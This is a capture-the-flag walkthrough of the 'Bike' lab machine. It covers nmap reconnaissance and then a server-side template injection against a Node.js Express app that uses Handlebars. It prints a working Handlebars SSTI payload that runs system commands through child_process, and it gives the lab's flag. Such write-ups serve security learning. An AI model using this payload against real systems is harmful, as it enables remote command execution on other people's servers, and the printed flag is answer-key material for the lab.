Bike

Task 1: What TCP ports does nmap identify as open? Answer with a list of ports separated by commas with no spaces, from low to high.

Run quick nmap scan:

nmap [Target IP]

This shows that ports 22 & 80 are open.

Task 2: What software is running the service listening on the http/web port identified in the first question?

Nmap version scan on port 80:

nmap -sV -p 80 [Target IP]

The answer is Node.js

Task 3: What is the name of the Web Framework according to Wappalyzer?

Open the target IP in your web browser.
Make sure to have the Wappalyzer extension installed on your browser.
Once on the target page, check the Wappalyzer analysis.
It shows Express as the Web Framework

Task 4: What is the name of the vulnerability we test for by submitting {{7*7}}?

Check the first part of the walkthrough given with the machine. This machine is based on server side template injection.

Task 5: What is the templating engine being used within Node.JS?

On the web page of the target IP submit {{7*7}} as a response to the email address form.
This will take you to an error page.
I browsed this page for a bit and found a reference in there to handlebars

Task 6: What is the name of the BurpSuite tab used to encode text?

Opening up Burpsuite I found that the tab is called "Decoder"

Task 7: In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?

On the decoder tab of burpsuite you can use the drop down menu to see the different types of encoding.
The answer is URL

Task 8: When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?

Navigate to the Hacktricks URL and more specifically the section on SSTI and Node.JS Handlebars
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs
There is a script to exploit the form. You can either URL encrypt the scrypt yourself or grab the already URL-encrypted script at the bottom.
- Turn on FoxyProxy and input the URL encoded script into the email form of the target web page and submit.
- The request should have been captured. From here, send the capture in Burpsuite to the Repeater.
- Click send and you should capture a response page with an error at the top.
- The error is going to specify that "Require" is not defined.

Task 9: What variable is the name of the top-level scope in Node.JS?

Reading through the walkthrough guide, I learned that the variable with the top-level scope is "Global".
- This makes sense as global variable are applied throughout for other languages as well.

Task 10: By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?

Start with the initial script from hacktricks.
We will modify this script and then URL encode it.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

After you have modified the script, URL encode it and send it through Burpsuites Repeater.
You should get a response back that the user is "root"

Capture the Flag:

Since we know the code above works, we can modify it again. We can either upload a reverse shell or just look for the flag.
- In this case we will just look for the flag while modifying the script above. Normally though we would start a reverse shell and look through our host machine as that would be easier to navigate.
In this case the flag is relatively easy to locate.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}

It is located in the /root directory under flag.txt.
The flag is "6b258d726d287462d60c103d0142a81c"

PreviousIgnition NextFunnel

Last updated 2 years ago